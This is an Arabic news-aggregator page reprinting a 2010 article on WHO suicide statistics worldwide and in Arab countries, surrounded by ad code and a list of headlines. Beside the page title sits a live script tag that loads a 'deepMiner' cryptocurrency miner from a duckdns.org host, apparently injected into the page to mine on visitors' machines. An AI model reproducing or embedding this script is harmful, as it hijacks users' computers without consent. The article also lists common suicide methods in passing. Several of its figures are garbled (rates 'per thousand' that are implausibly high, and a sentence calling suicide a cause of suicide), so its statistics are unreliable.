googletag.defineSlot('/21620968445/Djazairess_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-502778721-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_1', 'div-gpt-ad-502778721-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-502778719-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_3', 'div-gpt-ad-502778719-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-502778720-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_2', 'div-gpt-ad-502778720-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Widget', [[222, 280]], 'div-gpt-ad-1077287891-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Widget', 'div-gpt-ad-1077287891-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1575446168-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Siteunder', 'div-gpt-ad-1575446168-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); جزايرس : منظمة الصحة العالمية تؤكد ارتفاع نسبة الانتحار إلى 65 بالمائة في العالم<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
توقيف 17 شابا حراقا بعنابة    التحالف يأمر بوقف الهجوم على الحديدة    المستفيدون من سكنات السوسيال بالحجار غير معنيين بالترحيل قبل نهاية العام    أزمة مياه بعنابة والطارف إلى إشعار آخر    استنفار في الأوساط الصحية بجيجل بعد تسجيل إصابات جديدة بداء البوحمرون    إيمانويل ماكرون: فرنسا حليفة أمريكا وليست تابعة لها    لن أحجّ.. فضميري إن يقتلني فهو يحييني    ولد عباس يستقيل من «الأفلان» ويقدّم عطلة مرضية ب45 يوما    ليبرمان‮ ‬يستقيل احتجاجا على وقف إطلاق النار في‮ ‬غزة‮ ‬    تشاووش أوغلو‮:‬    خلال أحداث شغب في‮ ‬مقابلة مولودية الجزائر‮ - ‬اتحاد بلعباس    نظمتها المديرية العامة للحماية المدنية‮ ‬    المركز الوطني‮ ‬للكتاب‮ ‬يكشف‮:‬    سيستقبلون حامل اللقب اليوم    البطولة العربية للأمم في‮ ‬كرة السلة    نظم بمشاركة حوالي‮ ‬25‮ ‬عارضا بالشلف    قال إن بلادنا خرجت من الكابوس بفضل سياسات بوتفليقة..أويحيى يؤكد:    تلمسان    حملة إعلامية لشرح تفاصيله تطلقها الوزارة‮ ‬    الجزائر اليوم على السكة الصحيحة    الدالية تخطف الأضواء في‮ ‬البحرين    حزب العمال خزان للطاقات النضالية    الانتخابات ستجرى رسميا‮ ‬يوم‮ ‬29‮ ‬ديسمبر المقبل    من مرض السكري    5500 إصابة جديدة في 2018    حجز 1200 دولار مزوّرة    أزمة يد عاملة في الفلاحة    أجواء ونفحات روحانية متميزة في أدرار    البوابة الجزائرية للمخطوطات مشروع علمي طموح    إنتخاب أرنود مونتبورغ رئيسا جديدا لجمعية فرنسا-الجزائر    ملياردير يستعد للرئاسة الأمريكية المقبلة    26 ألف قتيل جزائري في الحرب العالمية الأولى    فتح فضاء جديد بوهران    انطلاق حملة تحسيسية بالجزائر العاصمة    الإستعمال المفرط للمضادات الحيوية يهدد الصحة البشرية    مصابيح الدجى عبد الله بن رواحة    بن أحمد يعد بمواصلة دعم الفريق    تونس آيت علي تطرح مواضيع مسكوت عنها في مسرحية «ساكتة»    مليكة يوسف، صاولي وهندو لإدخال البسمة في نفوس الجمهور    فرق محترفة تمثل 7 مسارح للمشاركة في التظاهرة    والي وهران يتدخل لفتح الموقع الالكتروني ل «عدل « قبل التوزيع القادم    لا تسامح بعد اليوم    «الخضر" عازمون على رفع التحدي    «العنف اللفظي أكثر من الجسدي وبعض وسائل الإعلام تتحمل المسؤولية»    سيطرة فرق ولاية معسكر    وزارة النقل تُفرج عن مشروع إنجاز محطة بحرية جديدة بميناء الغزوات    نسبة الأشغال فاقت 80 %    المتهم يتمسك بأقواله أمام القاضي    تنصيب لجان متابعة تسيير المناطق    ‘'طفل السرطان" يعتذر لأمه    التصفيات الجهوية للأنشودة الوطنية    إبراز دور الزكاة الفعال    الدنمارك تعتمد رسميا وسيلة نقل جديدة    عائلة أوكرانية تحتجز 94 عبدا!    ‘'حيتان أسيرة" بروسيا    الشيخ شمس الدين:” أنا داعية إلى الله وخاطيني السياسة”    صفات وشكل وملامح وجه النبي صلى الله عليه وسلم    قصة الملكين هاروت وماروت    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





منظمة الصحة العالمية تؤكد ارتفاع نسبة الانتحار إلى 65 بالمائة في العالم
نشر في الحوار يوم 05 - 01 - 2010

تقول إحصاءات المنظمة العالمية للصحّة ان مليون شخص في العالم ينتحرون كل سنة. ويشكل الانتحار عاشر سبب للوفاة لكنّه يمثّل ثالث سبب للانتحار بالنسبة للشريحة العمرية بين 15 و45 سنة، علما بأنّ محاولات الانتحار تفوق هذا العدد عشرين مرّة. وتشير المنظمة إلى أنّ الانتحار في العالم قد ارتفع بنسبة 65 بالمائة خلال نصف القرن الأخير. ولم تسلم أي ثقافة أو بلد أو ديانة من هذه الظاهرة الخطيرة. يتجاوز عدد المنتحرين في أوساط الرّجال عدد النساء المنتحرات بينما تفوق محاولات الانتحار لدى النساء. تتصدّر ليتوانيا قائمة بلدان العالم من حيث حالات الانتحار المسجلة إذ بلغت 68 في الألف من الرّجال و2,1 في الألف في أوساط النساء، تليها بيلاروسيا 3,63 في الألف بالنسبة للرجال و3,1 في الألف بالنسبة للنساء ثمّ روسيا ب58 في الألف بالنسبة للرجال و8,9 في الألف بالنسبة للنساء ثم كازاخستان ب45 في الألف بالنسبة للرجال و8 في الألف بالنسبة للنساء فسريلانكا ب6,44 في الألف بالنسبة للرجال و11 في الألف بالنسبة للنساء. تعود دوافع الانتحار إلى ضغوط نفسية واجتماعية وحالات انهيار عصبي. ويشكل الانتحار ''حلا'' وحيدا للذين يعانون من شعور عميق باليأس. ولكن، حيث يبدو انه المجتمعات لا تقدم لهؤلاء الضحايا حلولا بديلة، يبدو ان الانتحار يظل، ولو قسرا، يحتل مكانته ك''حل''. وفي العالم العربي، فقد بدأت ظاهرة الانتحار تأخذ أبعادا اجتماعية واضحة. إذ لم تعد مجرد تصرف فردي للتعبير عن اليأس، او حالة مرضية بسبب الكآبة، بل انها أصبحت قضية ترتبط بصلات وثيقة بالأوضاع الاقتصادية والاجتماعية البائسة التي يعيشها ملايين العرب. ففي سابقة هي الأولى من نوعها كشفت دوائر البحث الجنائي في ليبيا أن حالات الانتحار تشهد ارتفاعا خطيرا، الأمر الذي أثار قلق الخبراء الاجتماعيين والنفسيين، خصوصا أن التعتيم كان سيد الموقف في مثل هذه المواضيع من قبل. وحسب الأرقام المعلنة فإن بنغازي -وهي ثاني كبريات المدن الليبية بعد العاصمة طرابلس- سجلت أكبر نسبة في محاولات الانتحار، إذ بلغت في الفترة ما بين 2001 و2009 ما مجموعه 745 حالة توفي منها 124 رجل وامرأة، كما سجل مستشفى 7 أكتوبر ببنغازي، منذ بداية العام الجاري، ثمانين محاولة انتحار، منها 69 نفذتها فتيات. وحسب خبراء في المجال، فإن شنق النفس هو أكثر طرق الانتحار انتشارا في ليبيا، ويأتي بعده تناول مواد سامة وإلقاء النفس من أماكن مرتفعة وأخيرا قطع الأوردة والشرايين. ويرجع خبراء ومحلّلون هذا الإقبال الرهيب على عمليات الانتحار بين الليبيين إلى الأوضاع الاجتماعية السيئة التي يعيشها الكثير، خاصة الشباب، فيما يعتبر الفقر والعوز المادي أحد أهم الأسباب عند شرائح واسعة، والدليل على ذلك أن أكثر عمليات الانتحار المسجلة في الجماهيرية وقعت في الأحياء الفقيرة، على غرار حي العروبة الفقير بمدينة بنغازي الذي سجّل سبع حالات انتحار سنة .2008 ويعتبر الانتحار عاشر أسباب الموت عامة وثالثها بين الأفراد الذين تتراوح أعمارهم ما بين 15 و44 عاما. وحسب تقديرات منظمة الصحة العالمية التابعة للأمم المتحدة فإنه يوجد حوالي أكثر من مليون شخص ينتحرون سنويا في العالم. وأفادت المنظمة في تقرير لها بأن معدلات الانتحار في العالم قد ازدادت بنسبة 65 في المائة في آخر 45 عاما، وهي ظاهرة متفشية بين كافة الثقافات.
مصر تتصدر الدول العربية في نسبة الانتحار ب 1200 حالة سنويا
وتتصدر ليتوانيا قائمة الدول من حيث عدد حالات الانتحار بمعدل 68 في الألف من السكان الرجال مقابل 2,1 في الألف من النساء تليها بنسب متفاوتة كل من بيلاروسيا وروسيا ثم كازاخستان. أما المجتمعات العربية فتسجل نسب انتحار أقل، لكن المؤشرات في تصاعد وتنذر بدخول هذه المجتمعات مرحلة الخطر بعد أن ارتفع عدد وفيات الانتحار كثيرا في السنوات الأخيرة. وتزايدت نسب الانتحار في الوطن العربي خلال السنوات الأخيرة بشكل يدعو إلى القلق بعدما كانت هذه الظاهرة متفشية أكثر في الدول الغربية. ولعل أخطر دلالات الإحصاءات التي تهتم برصد ظاهرة الانتحار في المجتمعات العربية تشير إلى أن أكثر من 78 ممن يقدمون على الانتحار تنحصر أعمارهم ما بين 17 و40 عاما، وأغلب دوافع التخلص من الحياة يدخل فيها التدهور الاجتماعي الاقتصادي والفشل في إيجاد فرصة عمل، وهو ما يعني توجيه ضربة قاضية لعصب هذه المجتمعات ومن يقع على عاتقهم عبء النهضة والتقدم. وتشير الأرقام إلى أن ما بين 11 ألفا و14 ألف شاب وفتاة ينتمون لبلدان عربية يحاولون الانتحار كل عام وتتركز أعلى المعدلات في الدول التي تعاني مشكلات الفقر والبطالة اللتين تهددان سلامة واستقرار هذه المجتمعات، كما تزيد معدلات الانتحار في المجتمعات التي تعاني من حروب أهلية أو ترزح تحت الاحتلال أو الاقتتال الطائفي، فيندفع الشاب أو الفتاة للتخلص من حياته إذا ما فشل في تحقيق سعادته. وتعتبر مصر من بين أكثر الدول العربية التي تنتشر فيها حوادث انتحار الشباب، حيث تشير الأرقام إلى أن ما بين 750 إلى 1200 حادثة انتحار تقع كل عام نسبتها العظمى من الشباب، وتؤكد المعلومات أن الأسباب تعود بالأساس إلى عدم إيجاد فرصة عمل أو التخلص من الديون المالية، كما تحتل التجارب العاطفية التي تفشل بسبب ضغوط الحياة وارتفاع نفقات الزواج نسبة ليست بالهينة ضمن دوافع الانتحار بين الشباب. وفي الأردن تسجّل الإحصاءات 40 حالة انتحار و400 محاولة سنويا، وفي المغرب ثلاثة ملايين مغربي لا يخفون رغبتهم في وضع حد لحياتهم، كما تؤكد إحصائية حديثة أن معدلات حالات الانتحار في اليمن ارتفعت بشكل حاد خلال العامين الماضيين بنسبة تقارب 52 بالمائة.


انقر هنا لقراءة الخبر من مصدره.